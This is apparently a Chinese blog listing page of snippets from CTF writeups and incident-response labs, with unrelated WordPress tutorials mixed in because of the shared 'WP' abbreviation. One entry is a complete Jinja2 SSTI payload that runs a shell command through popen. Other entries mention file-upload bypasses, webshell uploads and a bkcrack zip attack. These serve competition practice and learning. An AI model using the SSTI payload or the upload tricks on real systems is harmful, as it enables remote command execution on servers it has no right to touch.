wp专题
2024 WaniCTF repwn 部分wp
lambda 文本编辑器打开附件 稍微格式化一下 结合gpt理解题目意思。 脚本 home 附件拖入ida 简单的检查环境和反调试,进构造flag的函数 简单的ollvm,用d810嗦一下 下断点调试,通过修改eip跳过反调试。查看dest内容,需要稍微向下翻一下,程序故意把flag藏在后面 gates
【华东南AWDP】第十七届全国大学生信息安全竞赛 CISCN 2024 创新实践能力赛区域赛 部分题解WP
前言:这次区域赛AWDP安恒作为支持,赛制风格遵循安恒,一小时check一次。室温35°在室内坐了8小时,午饭是藿香正气水拌冰水。这场总体下来中规中矩吧。 WEB-welcome-BREAK Ctrl+U拿到flag WEB-submit-BREAK 文件上传,简单绕过 绕过就两个,一个MIMA头,一个等号换php(短标签) WEB-submit-FIX 修两个点,一个是
玄机——第五章 Windows 实战-evtx 文件分析 wp
文章目录 一、前言二、概览简化 三、参考文章四、步骤(解析)步骤#11.将黑客成功登录系统所使用的IP地址作为Flag值提交;拓展1.1 步骤#22.黑客成功登录系统后修改了登录用户的用户名,将修改后的用户名作为Flag值提交;拓展1.2拓展1.3 步骤#33.黑客成功登录系统后成功访问了一个关键位置的文件,将该文件名称(文件名称不包含后缀)作为Flag值提交;拓展1.4拓展1.5 步
玄机——第六章 流量特征分析-waf 上的截获的黑客攻击流量 wp
文章目录 一、前言二、概览简介 三、参考文章四、步骤(解析)步骤#1.1黑客成功登录系统的密码 flag{xxxxxxxxxxxxxxx} 步骤#1.2黑客发现的关键字符串 flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} 步骤#1.3黑客找到的数据库密码 flag{xxxxxxxxxxxxxxxx} 一、前言 题目链接:第六章 流量特征分析-
贝壳APP渗透测试WP
前期配置 环境说明 使用PIXEL 4手机,为Android 12系统 APP名为贝壳找房,包名com.lianjia.beike,版本号3.01.10,截至2024/05/07为最新版,小米应用市场下载 绕过反Frida机制 可以参考往期推送,《绕过最新版bilibili APP反Frida机制》,见文章末尾。Bypass.js脚本可以通用,应该都是用的某个安卓安全产品 抓包 抓包
实测 WordPress 最佳优化方案:WP Super Cache+Memcached+CDN
说起 WordPress 优化加速来可以说是个经久不衰的话题了,包括明月自己都撰写发表了不少相关的文章。基本上到现在为止明月的 WordPress 优化方案已经固定成型了,那就是 WP Super Cache+Memcached+CDN 的方案,因为这个方案可以做到免费、稳定、安全、部署简单高效,特别适合草根博客站长们选择,当然也推荐中小企业网站使用的。 首先声明,本文并不是 Wor
bugku题目(带WP)
CTF题型,带WP。根据给出的题目,找到flag。 1、眼见非实 下载实验文件是一个file .zip 解压这个file.zip压缩包,得到眼见为实.docx文件 双击打开这个文件,不能读取。 修改眼见为实.docx的后缀为眼见为实.zip,再进行解压。 进入word文件夹,看到docment.xml 使用记事本或者notepad++打开docment.x
CISCN2024 初赛 wp 部分复现(Re)
Misc 1. 火锅链观光打卡 答题即可 Re 1. asm_re 感谢智谱清言,可以读出大致加密算法 这是输入 这是加密部分 这里判断 找到疑似密文的部分,手动改一下端序 #asm_wpdef dec(char):return (((char - 0x1E) ^ 0x4D) - 0x14) // 0x50 #return (ord(char) * 0
第二届黄河流域团队赛个人wp
个人wp web 两个题都几乎是网上的原题,不想多说了,放个链接,重点记录一下自己第一次遇到的misc 冰蝎流量分析 web1 https://blog.csdn.net/qq_51768842/article/details/125153850 web2 https://blog.csdn.net/m0_73512445/article/details/135266070 web2后面
玄机——第一章 应急响应-webshell查杀 wp(手把手保姆级教学)
文章目录 一、前言二、常规后门查杀1、手动排查webshell2、工具排查webshell 三、概览简介 四、参考文章五、步骤(解析)准备工作#1.0步骤#1.1黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx} 步骤#1.2黑客使用的什么工具的shell github地址的md5 flag{md5} 步骤#1.3黑客隐藏shell的完整路径的
【WP】猿人学_17_天杀的Http2.0
https://match.yuanrenxue.cn/match/17 抓包分析 居然对Fiddler有检测,不允许使用 那就使用浏览器抓包,好像没发现什么加密参数,然后重放也可以成功,时间长了也无需刷新页面,尝试Python复现。 Python复现 import requestsheaders = {"authority": "match.yuanrenxue.cn","
【WP】猿人学_13_入门级cookie
https://match.yuanrenxue.cn/match/13 抓包分析 抓包分析发现加密参数是cookie中有一个yuanrenxue_cookie 当cookie过期的时候,就会重新给match/13发包,这个包返回一段js代码,应该是生成cookie的 <script>document.cookie=('y')+('u')+('a')+('n')+('r')+(
【WP】猿人学13_入门级cookie
https://match.yuanrenxue.cn/match/13 抓包分析 抓包分析发现加密参数是cookie中有一个yuanrenxue_cookie 当cookie过期的时候,就会重新给match/13发包,这个包返回一段js代码,应该是生成cookie的 <script>document.cookie=('y')+('u')+('a')+('n')+('r')+(
Simple_SSTI_2 wp
payload {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat flag').read()}}
【WP|8】深入解析WordPress钩子函数
钩子函数(Hook)是WordPress插件和主题开发中最重要的概念之一。钩子函数允许开发者在特定的时刻或事件发生时插入自定义代码,以改变WordPress的默认行为或者添加新功能。钩子分为两种主要类型:动作(Actions)和过滤器(Filters)。 一、动作(Actions) 动作钩子允许开发者在特定的事件发生时执行自定义代码。动作钩子不返回任何值,它们只是执行代码块。以下是动作钩
第一款基于Samurai引擎的WP游戏《MarioJump》成功登陆应用商店~
最近的这两周写了一款类似于《Doodle Jump》的跳跃游戏,名为《MarioJump》。写这款游戏一方面是为了更好地修正和使用Samurai引擎,另一方面也是为了纪念童年里对《超级玛丽》的美好回忆。在开发这款游戏的过程中,发现当前版本的Samurai在页面切换方面做得很差劲,没有切换的特效,看上去很生硬。(不过已经想好了如何增加页面切换的特效了) 先Show下游戏的样子吧~ 图标:
All-in-One WP Migration插件+汉化包+扩展优化版
下载地址:All-in-One WP Migration插件+汉化包+扩展优化版 此插件支持大量的 WordPress 主机,不用担心网站数据搬家不完全,它使用区块方式导入数据,可避免大多数主机的上传限制(还原网站的时候)。
LitCTF 2024(公开赛道)——WP
目录 Misc 涐贪恋和伱、甾―⑺dé毎兮毎秒 你说得对,但__ 盯帧珍珠 Everywhere We Go 关键,太关键了! 女装照流量 原铁,启动! 舔到最后应有尽有 The love Web exx 一个....池子? SAS - Serializing Authentication System 浏览器也能套娃? 高亮主题(划掉)背景查看器 百万美元的
PolarCTF 2024夏季个人挑战赛 个人WP
【WEB】审计 直接给源码,php特性 秒了,有个特殊的东西 0e215962017,他md5后的值是本身 【WEB】扫扫看 敏感目录flag.php 【WEB】debudao 查看网页源码(里面的flag是错的) 查看网络 【WEB】ExX? 开题 扫一下,敏感目录如下 /dom.php DOM和题目名字ExX,联想XXE漏洞 参考:V
2024 HN CTF WebMisc 部分 wp
Web ez_tp 判断是thinkphp 3.2 参考官方手册:https://www.kancloud.cn/manual/thinkphp/1697 判断路由模式 'URL_CASE_INSENSITIVE' => true, // 默认false 表示URL区分大小写 true则表示不区分大小写'URL_MODEL' => 1, //
2024 五月份国内外CTF 散装re 部分wp
cr3CTF warmup 附件拖入ida main函数无法反汇编,仔细看,有花指令,jnz实际上必定跳转。有非常多处,可以写脚本patch程序去掉花指令,只要匹配指令,再获取跳转地址,nop掉中间的代码就行。但是我选择动调。输入的第一个字符先减掉一个常数,然后比较 之后的每一位字符都是先减掉一个常数,再异或之前的输入原文,然后比较。直接手动计算器
【WP|2】WordPress 高级函数和方法解析
在之前的文章中,我们讨论了 WordPress 的一些常用函数和方法。这篇文章将进一步探讨一些高级函数和方法,这些函数和方法能够帮助开发者更加精细地控制和定制 WordPress 网站,以实现更复杂和高级的功能。 一、高级主题函数 1. add_theme_support() 该函数用于启用主题的某些特性,如自定义背景、自定义标志、特色图片等。它通常在 functions.php 文件
2023、2024国赛web复现wp
2023 Unzip 类型:任意文件上传漏洞 主要知识点:软链接 随便上传一个一句话木马文件,得到一串php代码 根据代码上传zip文件发现进入后还是此页面 代码审计: <?phperror_reporting(0);highlight_file(__FILE__);$finfo = finfo_open(FILEINFO_MIME_TYPE);#创建一个新的文件资源
【WP|4】WordPress 简码(Shortcode)开发详解
简码(Shortcode)是 WordPress 提供的一项强大功能,允许开发者创建自定义的代码块,以便在文章、页面或小工具中轻松插入动态内容。本文将详细讲解简码的开发,从基础概念到高级用法,帮助你充分利用这一功能。 一、简码的基础 简码是一段简短的代码,用户可以在 WordPress 编辑器中使用它来插入动态内容。简码通常以方括号包围,例如 [shortcode]。 1. 创建简单的
第一届 长城杯 总决赛wp
第一届 长城杯 总决赛 - Ahisec 第一阶段 Zip_guessinteger 第一层bkcrack攻击部分明文,注意偏移 ┌──(root㉿Ten)-[~/tools/Misc/bkcrack]└─# ./bkcrack -C zip_guessinteger.zip -c breakthroughentry.txt+flag.txt.zip -p 1.txt -o 30
ISCC2024个人挑战赛WP-WEB
(非官方解,以下内容均互联网收集的信息和个人思路,仅供学习参考) 还没想好名字的塔防游戏 GET /world.js HTTP/1.1 Host: 101.200.138.180:17345 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;